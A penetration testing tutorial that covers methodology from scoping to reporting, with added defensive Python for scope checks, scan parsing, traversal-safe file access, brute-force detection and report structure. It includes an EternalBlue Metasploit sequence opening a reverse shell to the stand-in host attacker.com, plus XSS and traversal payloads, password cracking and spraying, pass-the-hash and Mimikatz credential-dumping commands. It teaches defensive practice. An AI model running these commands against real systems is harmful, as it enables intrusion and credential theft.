Key Takeaways

  • Always have written authorization before testing.
  • Follow a structured methodology (recon → scan → exploit → report).
  • Document everything for comprehensive reporting.
  • The goal is to improve security, not just find vulnerabilities.
  • Post-exploitation demonstrates real business impact.
  • Professional reports include prioritized remediation steps.

1. What is Penetration Testing?

Penetration testing (pentesting) is an authorized simulated attack on a computer system to evaluate its security. Unlike vulnerability scanning, which only identifies potential weaknesses, pentesting attempts to actually exploit vulnerabilities to demonstrate real-world impact.

The goal is to identify security gaps before malicious actors do, providing organizations with actionable insights to improve their security posture. Professional pentesters think like attackers but work ethically to help defenders.

Authorization is Mandatory

Penetration testing without explicit written authorization is illegal. Always obtain a signed Rules of Engagement document defining scope, timing, and boundaries before any testing. Testing third-party infrastructure requires their permission too.

2. Types of Penetration Tests

Type       | Knowledge                           | Simulates
-----------|-------------------------------------|-------------------------------
Black Box  | No prior knowledge                  | External attacker
White Box  | Full knowledge (code, architecture) | Insider or comprehensive audit
Gray Box   | Partial knowledge                   | Authenticated user, partner

2.1 Test Categories

3. Pentest Methodology

Standard Pentest Phases

1. Pre-engagement: Scoping, authorization, rules
2. Reconnaissance: Information gathering
3. Scanning: Enumeration, vulnerability assessment
4. Exploitation: Gaining access
5. Post-exploitation: Privilege escalation, lateral movement
6. Reporting: Documentation, recommendations
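The pre-engagement phase is where scope is fixed, and every later phase should be gated on it. The script below is an added illustration (not code from the original page) of encoding a Rules of Engagement document as data and refusing any target it does not cover: address ranges, a domain and its subdomains, explicit exclusions, and the authorized time window. The ROE layout, the function names, the RFC 5737 test networks and the demo clock values are assumptions made for this example.

```python
"""Rules-of-Engagement scope check (added example, not from the original page).

The ROE dictionary layout, the constructed networks and the testing window
are assumptions made for illustration.
"""
import ipaddress
from datetime import datetime, timezone

# Constructed stand-in for the signed scoping document.
ROE = {
    "in_scope_networks": ["10.10.0.0/16", "192.0.2.0/24"],
    "in_scope_domains": ["example.com"],      # subdomains included
    "excluded_hosts": ["10.10.5.1"],          # e.g. a production database the ROE names as off-limits
    "window_start": datetime(2024, 6, 3, 9, 0, tzinfo=timezone.utc),
    "window_end": datetime(2024, 6, 7, 17, 0, tzinfo=timezone.utc),
}

# Constructed clock values used by the demo and the checks.
DURING_WINDOW = datetime(2024, 6, 4, 12, 0, tzinfo=timezone.utc)
AFTER_WINDOW = datetime(2024, 6, 8, 9, 0, tzinfo=timezone.utc)


def _domain_in_scope(name, domains):
    """True for the domain itself or any subdomain (not for 'notexample.com')."""
    name = name.lower().rstrip(".")
    return any(name == d or name.endswith("." + d) for d in domains)


def in_scope(target, roe=ROE, now=None):
    """Return (allowed, reason). Anything the ROE does not cover is refused."""
    now = now or datetime.now(timezone.utc)
    if not (roe["window_start"] <= now <= roe["window_end"]):
        return False, "outside authorized testing window"
    if target in roe["excluded_hosts"]:
        return False, "explicitly excluded by the ROE"
    try:
        ip = ipaddress.ip_address(target)
    except ValueError:
        # Not an IP literal: treat it as a hostname
        if _domain_in_scope(target, roe["in_scope_domains"]):
            return True, "domain in scope"
        return False, "domain not in scope"
    for net in roe["in_scope_networks"]:
        if ip in ipaddress.ip_network(net):
            return True, f"address in {net}"
    return False, "address not in any in-scope network"


def filter_targets(targets, roe=ROE, now=None):
    """Split candidate targets into (allowed, refused) lists of (target, reason)."""
    allowed, refused = [], []
    for t in targets:
        ok, reason = in_scope(t, roe, now)
        (allowed if ok else refused).append((t, reason))
    return allowed, refused


if __name__ == "__main__":
    candidates = ["10.10.3.7", "10.10.5.1", "www.example.com", "notexample.com", "203.0.113.9"]
    allowed, refused = filter_targets(candidates, now=DURING_WINDOW)
    print("allowed:", allowed)
    print("refused:", refused)
```

Feeding a tool's target list through `filter_targets` before a scan starts turns the signed scope document into an enforced control rather than a reminder; the refused list with reasons also belongs in the engagement log.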

4. Reconnaissance Phase

4.1 Passive Reconnaissance

# OSINT gathering (no direct interaction with target)
# WHOIS lookup
whois example.com

# DNS records
dig example.com ANY
# Reverse lookup for each A record (a single -x cannot take several addresses or a CNAME target)
for ip in $(dig +short A example.com | grep -E '^[0-9.]+$'); do dig +short -x "$ip"; done

# Subdomain enumeration
amass enum -passive -d example.com
subfinder -d example.com

# Historical data
# Check archive.org, Certificate Transparency logs

# Employee OSINT
# LinkedIn, social media, data breaches

4.2 Active Reconnaissance

# Port scanning
nmap -sS -sV -sC -O -p- -T4 target.com

# Common Nmap options:
# -sS: SYN scan (stealth)
# -sV: Version detection
# -sC: Default scripts
# -O: OS detection
# -p-: All ports

# Web application scanning
nikto -h https://target.com
gobuster dir -u https://target.com -w /usr/share/wordlists/dirb/common.txt

# Service enumeration
enum4linux -a target.com    # SMB
smtp-user-enum -M VRFY -U users.txt -t target.com
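Scan output is only useful once it becomes a per-host inventory that can be compared against what the organization expects to be exposed. The parser below is an added example (not code from the original page or from the Nmap project) that reads Nmap's greppable output, the `-oG` format, into a service inventory; the two hosts, their services and the function names are constructed for this illustration.

```python
"""Parse Nmap greppable (-oG) output into a per-host service inventory.

Added example, not from the original page. The scan output below is
constructed to look like what `nmap -sS -sV -p- -oG scan.gnmap` writes.
"""
import re

# Constructed sample; the two hosts and services are fictitious.
SAMPLE_GNMAP = (
    "# Nmap 7.94 scan initiated Mon Jun  3 10:00:00 2024 as: nmap -sS -sV -p- -oG scan.gnmap 10.10.3.0/24\n"
    "Host: 10.10.3.7 ()\tStatus: Up\n"
    "Host: 10.10.3.7 ()\tPorts: 22/open/tcp//ssh//OpenSSH 8.9p1 Ubuntu/, "
    "80/open/tcp//http//nginx 1.18.0/, 445/filtered/tcp//microsoft-ds///\tIgnored State: closed (65532)\n"
    "Host: 10.10.3.9 (fileserver.example.com)\tStatus: Up\n"
    "Host: 10.10.3.9 (fileserver.example.com)\tPorts: 139/open/tcp//netbios-ssn//Samba smbd 4/, "
    "445/open/tcp//netbios-ssn//Samba smbd 4.15.13-Ubuntu/\tIgnored State: closed (65533)\n"
    "# Nmap done at Mon Jun  3 10:21:00 2024 -- 256 IP addresses (2 hosts up) scanned in 1260.00 seconds\n"
)

HOST_RE = re.compile(r"^Host: (\S+) \((.*?)\)")


def parse_gnmap(text):
    """Return {ip: {"hostname": str, "ports": [{port, state, proto, service, version}, ...]}}."""
    hosts = {}
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if not m:
            continue  # comment lines and anything else
        ip, hostname = m.group(1), m.group(2)
        entry = hosts.setdefault(ip, {"hostname": hostname, "ports": []})
        for field in line.split("\t"):
            if not field.startswith("Ports: "):
                continue
            for item in field[len("Ports: "):].split(", "):
                # Field layout: port/state/proto/owner/service/rpc/version/
                parts = item.split("/")
                if len(parts) < 7:
                    continue
                entry["ports"].append({
                    "port": int(parts[0]),
                    "state": parts[1],
                    "proto": parts[2],
                    "service": parts[4],
                    "version": parts[6],
                })
    return hosts


def open_ports(hosts, ip):
    """Sorted list of open port numbers for one host."""
    return sorted(p["port"] for p in hosts[ip]["ports"] if p["state"] == "open")


def hosts_by_service(hosts, service):
    """(ip, port) pairs exposing a service name, to compare against the expected exposure list."""
    return sorted((ip, p["port"]) for ip, h in hosts.items() for p in h["ports"]
                  if p["state"] == "open" and p["service"] == service)


if __name__ == "__main__":
    inventory = parse_gnmap(SAMPLE_GNMAP)
    for ip, h in inventory.items():
        label = f"{ip} ({h['hostname']})" if h["hostname"] else ip
        print(label)
        for p in h["ports"]:
            print(f"  {p['port']}/{p['proto']} {p['state']:9} {p['service']:14} {p['version']}")
```

The same inventory is what a defender diffs between scans: a new open port or a changed version string on a known host is a finding in its own right, whichever side of the engagement produced it.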

5. Exploitation

5.1 Metasploit Framework

# Start Metasploit
msfconsole

# Search for exploits
search type:exploit platform:windows smb

# Use exploit
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS target.com
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST attacker.com
exploit

5.2 Web Application Exploitation

# SQL Injection with SQLMap
sqlmap -u "https://target.com/page?id=1" --dbs --batch

# XSS testing
# Manual: <script>alert('XSS')</script>
# Tools: XSStrike, Burp Suite

# File upload bypass
# Test: .php.jpg, .phtml, content-type manipulation

# Directory traversal
# Test: ../../etc/passwd, various encodings
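The directory traversal test above works because a naive handler joins user input onto a base directory without checking where the result lands. The example below is added here (not code from the original page) to show the vulnerable pattern next to its hardened form: decode first, resolve `..` and symlinks with `realpath`, then verify the result is still under the document root. The handler names and the constructed web root built in a temporary directory are assumptions for this illustration.

```python
"""Directory traversal: a naive file handler next to a hardened one.

Added example, not from the original page. The handler names and the
constructed web root (built in a temporary directory) are assumptions.
"""
import os
import tempfile
from urllib.parse import unquote


def build_sandbox():
    """Constructed layout: <tmp>/www/index.html inside the web root, <tmp>/secret.txt outside it."""
    root = tempfile.mkdtemp()
    www = os.path.join(root, "www")
    os.makedirs(www)
    with open(os.path.join(www, "index.html"), "w") as f:
        f.write("<h1>hello</h1>")
    with open(os.path.join(root, "secret.txt"), "w") as f:
        f.write("outside the web root")
    return www


def vulnerable_read(base_dir, user_path):
    """Naive join: '../' segments walk out of base_dir, and an absolute path replaces it entirely."""
    path = os.path.join(base_dir, unquote(user_path))
    with open(path, "rb") as f:
        return f.read()


def resolve_within(base_dir, user_path):
    """Return the real path for user_path if it stays under base_dir, else None."""
    base = os.path.realpath(base_dir)
    decoded = unquote(user_path)            # decode before checking, so %2e%2e%2f is not missed
    if "\x00" in decoded:
        return None                         # NUL bytes truncate paths in C-backed APIs
    relative = decoded.lstrip("/\\")        # an absolute path must not replace the root
    candidate = os.path.realpath(os.path.join(base, relative))   # collapses '..' and symlinks
    return candidate if os.path.commonpath([base, candidate]) == base else None


def safe_read(base_dir, user_path):
    """Serve a file only when it resolves inside base_dir."""
    target = resolve_within(base_dir, user_path)
    if target is None:
        raise PermissionError("path escapes document root")
    with open(target, "rb") as f:
        return f.read()


if __name__ == "__main__":
    www = build_sandbox()
    print("naive handler leaks:", vulnerable_read(www, "../secret.txt"))
    for payload in ["../secret.txt", "%2e%2e%2fsecret.txt", "/etc/passwd", "index.html"]:
        print(f"{payload!r:28} contained={resolve_within(www, payload) is not None}")
```

Checking the resolved path rather than the input string is what makes the encoded variants fall out for free: there is nothing to pattern-match, only a containment test on the final filesystem location.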

5.3 Password Attacks

# Hydra for brute force
hydra -l admin -P /usr/share/wordlists/rockyou.txt target.com ssh

# Hash cracking with Hashcat
hashcat -m 1000 -a 0 hashes.txt rockyou.txt  # NTLM
hashcat -m 1800 -a 0 hashes.txt rockyou.txt  # SHA512crypt

# Password spraying
crackmapexec smb target.com -u users.txt -p 'Summer2024!'
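Brute force and password spraying leave different footprints in authentication logs: one account hit many times versus many accounts hit once or twice each from the same source. The detector below is an added example (not code from the original page) that runs both rules over sshd log lines with a sliding time window and notes whether any successful login followed from the same source. The log lines are constructed (RFC 5737 addresses, made-up users) and the thresholds are assumptions.

```python
"""Detect password spraying and single-account brute force in SSH auth logs.

Added example, not from the original page. The log lines are constructed
(RFC 5737 addresses, made-up users) and the thresholds are assumptions.
"""
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta

SAMPLE_AUTH_LOG = """\
Jun  4 09:12:01 bastion sshd[2101]: Failed password for alice from 203.0.113.9 port 51022 ssh2
Jun  4 09:12:03 bastion sshd[2103]: Failed password for bob from 203.0.113.9 port 51030 ssh2
Jun  4 09:12:05 bastion sshd[2105]: Failed password for invalid user carol from 203.0.113.9 port 51041 ssh2
Jun  4 09:12:07 bastion sshd[2107]: Failed password for dave from 203.0.113.9 port 51050 ssh2
Jun  4 09:12:09 bastion sshd[2109]: Failed password for erin from 203.0.113.9 port 51058 ssh2
Jun  4 09:12:13 bastion sshd[2113]: Accepted password for erin from 203.0.113.9 port 51060 ssh2
Jun  4 09:30:00 bastion sshd[2300]: Failed password for alice from 198.51.100.4 port 40001 ssh2
Jun  4 09:30:02 bastion sshd[2301]: Failed password for alice from 198.51.100.4 port 40002 ssh2
Jun  4 09:30:04 bastion sshd[2302]: Failed password for alice from 198.51.100.4 port 40003 ssh2
Jun  4 09:30:06 bastion sshd[2303]: Failed password for alice from 198.51.100.4 port 40004 ssh2
Jun  4 10:02:11 bastion sshd[2410]: Failed password for frank from 192.0.2.50 port 33001 ssh2
Jun  4 10:02:20 bastion sshd[2412]: Accepted password for frank from 192.0.2.50 port 33001 ssh2
"""

LINE_RE = re.compile(
    r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(Failed|Accepted) password for (?:invalid user )?(\S+) from (\S+) port \d+"
)


def parse_auth_log(text):
    """Turn sshd lines into event dicts; lines that do not match are ignored."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        events.append({
            "time": datetime.strptime(m.group(1), "%b %d %H:%M:%S"),  # syslog carries no year
            "ok": m.group(2) == "Accepted",
            "user": m.group(3),
            "src": m.group(4),
        })
    return events


def detect(events, window=timedelta(minutes=10), spray_users=4, spray_max_per_user=2, brute_attempts=4):
    """One alert per source: 'password_spray' (many users, few tries each) or 'brute_force' (one user, many tries)."""
    by_src = defaultdict(list)
    for e in events:
        by_src[e["src"]].append(e)
    alerts = []
    for src, evs in by_src.items():
        fails = sorted((e for e in evs if not e["ok"]), key=lambda e: e["time"])
        best = None
        left = 0
        for right in range(len(fails)):           # sliding window over failures
            while fails[right]["time"] - fails[left]["time"] > window:
                left += 1
            counts = Counter(e["user"] for e in fails[left:right + 1])
            attempts = sum(counts.values())
            if len(counts) >= spray_users and max(counts.values()) <= spray_max_per_user:
                kind = "password_spray"
            elif len(counts) == 1 and attempts >= brute_attempts:
                kind = "brute_force"
            else:
                continue
            if best is None or attempts > best["attempts"]:
                first = fails[left]["time"]
                best = {
                    "src": src, "kind": kind, "users": len(counts), "attempts": attempts,
                    # successful logins from the same source after the window opened
                    "successes": sorted({e["user"] for e in evs if e["ok"] and e["time"] >= first}),
                }
        if best:
            alerts.append(best)
    return alerts


if __name__ == "__main__":
    for a in detect(parse_auth_log(SAMPLE_AUTH_LOG)):
        print(f"{a['src']:14} {a['kind']:15} users={a['users']} attempts={a['attempts']} successes={a['successes']}")
```

Spraying is specifically designed to stay under per-account lockout thresholds, which is why the rule counts distinct users per source rather than failures per user; a success recorded after the spray window is the line that turns an alert into an incident.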

6. Post-Exploitation

6.1 Privilege Escalation

# Linux privilege escalation
# Check sudo permissions
sudo -l

# Find SUID binaries
find / -perm -4000 -type f 2>/dev/null

# Kernel exploits
uname -a  # Check kernel version

# Windows privilege escalation
# Check privileges
whoami /priv

# Unquoted service paths
wmic service get name,pathname | findstr /i "Program Files"

# Automated enumeration
# Linux: LinPEAS, LinEnum
# Windows: WinPEAS, PowerUp
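The unquoted service path check above matters because Windows resolves an unquoted path containing spaces by trying each space-delimited prefix with `.exe` appended before reaching the real binary. The audit below is an added example (not code from the original page) that parses `wmic`-style output, flags services whose executable path is unquoted and contains a space, lists the locations whose write permissions must be verified, and produces the quoted path that fixes the finding. The service table and names are constructed.

```python
"""Audit Windows service binary paths for the unquoted-path misconfiguration.

Added example, not from the original page. The service table is constructed
to look like `wmic service get name,pathname` output; names are fictitious.
"""
import re

SAMPLE_WMIC = r"""
Name              PathName
Spooler           C:\Windows\System32\spoolsv.exe
AcmeUpdater       C:\Program Files\Acme Corp\Updater\acme_update.exe --service
AcmeAgent         "C:\Program Files\Acme Corp\Agent\agent.exe" /run
PlainSvc          C:\Tools\svc.exe
"""

EXE_RE = re.compile(r"^(.*?\.exe)\b", re.IGNORECASE)


def parse_wmic(text):
    """Return {service_name: pathname} from the two-column, space-padded table."""
    services = {}
    for line in text.strip().splitlines():
        parts = re.split(r"\s{2,}", line.strip(), maxsplit=1)
        if len(parts) != 2 or parts[0] == "Name":
            continue
        services[parts[0]] = parts[1]
    return services


def audit_service_path(pathname):
    """Return a finding dict when the executable path is unquoted and contains a space, else None."""
    p = pathname.strip()
    if p.startswith('"'):
        return None                      # quoted: the service control manager knows where the path ends
    m = EXE_RE.match(p)
    if not m:
        return None
    exe = m.group(1)
    if " " not in exe:
        return None                      # no ambiguity without a space
    # Windows tries the path split at each space, in order, before the full path
    words = exe.split(" ")
    search_order = [" ".join(words[:i]) + ".exe" for i in range(1, len(words))] + [exe]
    return {
        "exe": exe,
        "search_order": search_order,
        "fixed": f'"{exe}"{p[len(exe):]}',   # remediation: quote the executable path
    }


def audit_all(text):
    """Map of service name -> finding for every misconfigured service."""
    findings = {}
    for name, path in parse_wmic(text).items():
        f = audit_service_path(path)
        if f:
            findings[name] = f
    return findings


if __name__ == "__main__":
    for name, f in audit_all(SAMPLE_WMIC).items():
        print(f"{name}: unquoted path {f['exe']!r}")
        for cand in f["search_order"][:-1]:
            print(f"  verify standard users cannot create {cand}")
        print(f"  fix: set PathName to {f['fixed']}")
```

The finding is only exploitable when a standard user can write to one of the parent directories in the search order, so the audit output doubles as the list of ACLs to check and the quoted path as the one-line remediation for the report.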

6.2 Lateral Movement

# Pass the Hash
crackmapexec smb targets.txt -u Administrator -H aad3b435b51404eeaad3b435b51404ee:hash

# PSExec
psexec.py domain/user:password@target.com

# Mimikatz for credential extraction
mimikatz.exe
sekurlsa::logonpasswords

6.3 Data Exfiltration (Proof)

Demonstrate impact by accessing sensitive data (with permission). Document findings without actually extracting real sensitive data. Screenshots of access are sufficient proof.

7. Reporting

7.1 Report Structure

7.2 Finding Documentation

# For each finding, document:
- Title: Clear, descriptive name
- Severity: Critical/High/Medium/Low/Info
- CVSS Score: Standardized severity rating
- Affected Assets: Specific hosts/URLs
- Description: What the vulnerability is
- Evidence: Screenshots, PoC code, requests
- Impact: What could an attacker do?
- Remediation: How to fix it
- References: CVE, CWE, OWASP links

Quality Reports Matter
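A finding record that enforces the field list above keeps a report consistent and lets remediation be ordered by risk. The code below is an added example (not from the original page) that derives the severity label from the CVSS v3.1 qualitative scale, reports required fields left empty, sorts findings for the remediation plan, and renders one finding in the template above. The sample findings and the class and function names are constructed for the illustration; the page's "Info" label stands in for the CVSS scale's "None".

```python
"""Finding record with CVSS-derived severity and completeness checks.

Added example, not from the original page. The field set follows the
finding template; the sample findings are constructed.
"""
from dataclasses import dataclass, field

REQUIRED = ["title", "affected_assets", "description", "evidence", "impact", "remediation"]


def cvss_to_severity(score):
    """CVSS v3.1 qualitative rating scale; 'Info' stands in for the spec's 'None'."""
    if not 0.0 <= score <= 10.0:
        raise ValueError(f"CVSS base score out of range: {score}")
    if score == 0.0:
        return "Info"
    if score < 4.0:
        return "Low"
    if score < 7.0:
        return "Medium"
    if score < 9.0:
        return "High"
    return "Critical"


@dataclass
class Finding:
    title: str
    cvss: float
    affected_assets: list = field(default_factory=list)
    description: str = ""
    evidence: str = ""
    impact: str = ""
    remediation: str = ""
    references: list = field(default_factory=list)

    @property
    def severity(self):
        return cvss_to_severity(self.cvss)

    def missing_fields(self):
        """Names of required fields left empty; a report should not ship with any."""
        return [name for name in REQUIRED if not getattr(self, name)]


def prioritize(findings):
    """Highest CVSS first, so remediation effort goes where the risk is."""
    return sorted(findings, key=lambda f: f.cvss, reverse=True)


def render(f):
    """Plain-text block in the order of the finding template."""
    return "\n".join([
        f"Title: {f.title}",
        f"Severity: {f.severity}",
        f"CVSS Score: {f.cvss}",
        f"Affected Assets: {', '.join(f.affected_assets)}",
        f"Description: {f.description}",
        f"Evidence: {f.evidence}",
        f"Impact: {f.impact}",
        f"Remediation: {f.remediation}",
        f"References: {', '.join(f.references)}",
    ])


# Constructed sample findings (hosts, scores and text are fictitious).
SAMPLE_FINDINGS = [
    Finding("Unquoted service path on AcmeUpdater", 7.8, ["10.10.3.7"],
            description="Service binary path contains spaces and is not quoted.",
            evidence="wmic output, screenshot 03", impact="Local privilege escalation to SYSTEM.",
            remediation="Quote the service binary path.", references=["CWE-428"]),
    Finding("Directory listing enabled", 5.3, ["https://www.example.com/static/"],
            description="Web server exposes directory indexes.", evidence="screenshot 07",
            impact="Discloses file names under /static/.", remediation=""),   # remediation still missing
    Finding("Outdated TLS cipher suites", 3.7, ["www.example.com:443"],
            description="CBC suites offered.", evidence="scanner output",
            impact="Weak crypto in legacy clients.", remediation="Restrict to AEAD suites."),
]


def report_gaps(findings):
    """{title: [missing fields]} for findings that are not ready to ship."""
    return {f.title: f.missing_fields() for f in findings if f.missing_fields()}


if __name__ == "__main__":
    for f in prioritize(SAMPLE_FINDINGS):
        print(f"[{f.severity:8}] {f.cvss:4} {f.title}")
    print("incomplete:", report_gaps(SAMPLE_FINDINGS))
```

Running `report_gaps` before the report goes out catches the most common documentation failure, a finding with evidence but no remediation, which is exactly the part the client needs to act on.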

The report is the primary deliverable. A well-written report that helps the organization improve security is more valuable than finding many vulnerabilities with poor documentation. Focus on actionable recommendations.

8. Frequently Asked Questions

How do I get started in penetration testing?
Start with learning networking and operating systems fundamentals. Practice on legal platforms like HackTheBox, TryHackMe, and VulnHub. Build a home lab. Consider certifications like OSCP, CEH, or PNPT. Entry-level roles include SOC analyst or junior pentester.

What's the difference between pentest and vulnerability assessment?
Vulnerability assessments identify potential weaknesses using automated scanners. Penetration tests attempt to exploit vulnerabilities to prove impact. Pentests include manual testing, chaining vulnerabilities, and demonstrating what an actual attacker could achieve.

Conclusion

Penetration testing is a critical security practice that identifies real vulnerabilities before attackers do. Follow a structured methodology, document everything, and focus on providing actionable value to the organization. Always operate ethically and within authorized scope.
